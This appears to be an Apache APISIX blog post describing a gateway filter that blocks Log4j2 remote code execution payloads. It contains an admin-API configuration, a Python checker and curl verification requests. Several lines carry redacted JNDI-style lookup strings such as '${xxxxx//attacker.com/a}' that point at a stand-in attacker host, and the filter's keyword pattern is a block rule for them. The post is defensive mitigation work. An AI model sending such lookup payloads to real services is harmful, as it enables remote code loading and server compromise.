The Apache Log4j2 remote code execution vulnerability was recently exposed on the Internet. It was disclosed before the Apache Log4j2 development team had finished the fix, which led to exploitation in the wild. Projects using Log4j2 versions 2.x to 2.14.1 are at risk of being attacked.
Vulnerability analysis
From reproducing the vulnerability we can see that the key step in exploiting it is a crafted malicious payload of the form
{xxxxx//attacker.com/a}
Until the fully fixed version is officially released and the affected environments have been upgraded to it, a temporary measure is needed to intercept requests carrying malicious payloads and protect services from in-the-wild attacks on this vulnerability.
Apache APISIX countermeasures
On Apache APISIX we can filter the request payload, match the keyword of the malicious payload with a regular expression, and block the request.
Assuming the payload keyword is "xxxxx", the serverless plugin can be used to run a custom interception script. An example configuration follows:
curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
    "uri": "/*",
    "plugins": {
        "serverless-pre-function": {
            "phase": "rewrite",
            "functions": [
                "return function(conf, ctx) local core = require(\"apisix.core\"); local payload, err = core.request.get_body(); if not payload then local uri_args, err = core.request.get_uri_args(ctx)\n if uri_args then payload = core.json.encode(uri_args, true) end; end; local m = ngx.re.match(payload, \"xxxxx\", \"jo\"); if m then ngx.exit(403) end; end"
            ]
        }
    },
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "127.0.0.1:1980": 1
        }
    }
}'
Note: the serverless-pre-function block in the configuration above is the custom script part. The rest is ordinary Apache APISIX route configuration; adjust it to your actual environment.
The script in the functions field above does three things:
- Extracts the request payload (the URL query parameters of a GET request, or the request body of a POST/PUT request)
- Matches the payload against the regular expression for the malicious pattern
- Rejects requests whose payload matches
This script illustrates one way of handling such malicious-payload requests: capture an attack feature, such as the jndi keyword, and block on it. You can refine or extend the script according to your needs.
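As an added example (not code from the original post or from the APISIX project), the following Python mirrors the filter's matching logic so the pattern can be checked offline against the same request shapes verified in the next section. It deliberately goes a little beyond the Lua script: it percent-decodes the query and body and matches case-insensitively, and it inspects header values as well, since those are typically logged too. The keyword "xxxxx" stands in for the redacted attack feature, as in the post; the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# "xxxxx" stands in for the redacted attack feature, exactly as in the post;
# replace it with the keyword you actually match (e.g. the jndi lookup keyword).
KEYWORD_PATTERN = re.compile(r"xxxxx", re.IGNORECASE)

def request_payload(url, headers, body):
    """Gather the request parts to inspect.

    The serverless script inspects the body, falling back to the URI args.
    This version inspects query, body and header values together and
    percent-decodes query and body first, so an encoded form of the same
    keyword does not slip past the match (a defensive superset of the script).
    """
    parts = [unquote_plus(urlsplit(url).query)]
    if body:
        parts.append(unquote_plus(body))
    parts.extend(str(value) for value in headers.values())
    return "\n".join(parts)

def should_block(url, headers=None, body=None):
    """True when the gateway would answer 403 instead of proxying upstream."""
    return KEYWORD_PATTERN.search(request_payload(url, headers or {}, body)) is not None

# Constructed sample requests modelled on the post's verification steps; the
# fifth is the form case with a percent-encoded, mixed-case body, which the
# raw-body regex in the Lua script would not match. Format: (url, headers, body, expected).
FORM = {"Content-Type": "application/x-www-form-urlencoded"}
SAMPLES = [
    ("http://127.0.0.1:9080/hello?foo=${xxxxx//attacker.com/a}", {}, None, True),
    ("http://127.0.0.1:9080/hello", {"Content-Type": "application/json"},
     '{"foo": "${xxxxx//attacker.com/a}"}', True),
    ("http://127.0.0.1:9080/hello", {"Content-Type": "text/plain"},
     "{xxxxx//attacker.com/a}", True),
    ("http://127.0.0.1:9080/hello", FORM, "foo=${xxxxx//attacker.com/a}", True),
    ("http://127.0.0.1:9080/hello", FORM, "foo=%24%7BXXXXX%2F%2Fattacker.com%2Fa%7D", True),
    ("http://127.0.0.1:9080/hello?foo=bar", {"User-Agent": "curl/7.79.1"}, None, False),
]

def check_samples():
    """Return one verdict per sample: True if the filter decided as expected."""
    return [should_block(url, headers, body) == expected
            for url, headers, body, expected in SAMPLES]

if __name__ == "__main__":
    for (url, _, body, _), ok in zip(SAMPLES, check_samples()):
        print("OK  " if ok else "FAIL", url, body or "")
```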
Verify
Payload carried in the GET request parameters:
curl -I 'http://127.0.0.1:9080/hello?foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
……
Payload carried in the POST request body (application/json):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/json' -X POST -d '
{
"foo": "${xxxxx//attacker.com/a}"
}'
HTTP/1.1 403 Forbidden
……
Payload carried in the POST request body (text/plain):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: text/plain' -X POST -d '
{xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
……
Payload carried in the POST request body (application/x-www-form-urlencoded, with the request body not URL-encoded):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d '
foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
……
About Apache APISIX
Apache APISIX is a dynamic, real-time, high-performance open source API gateway that provides rich traffic management features such as load balancing, dynamic upstreams, canary releases, circuit breaking, authentication, and observability. Apache APISIX helps companies process API and microservice traffic quickly and securely, in scenarios including API gateway, Kubernetes Ingress, and service mesh.
Apache APISIX adopters (partial list)
- Apache APISIX GitHub: https://github.com/apache/apisix
- Apache APISIX official website: https://apisix.apache.org/
- Apache APISIX documentation: https://apisix.apache.org/en/docs/apisix/getting-started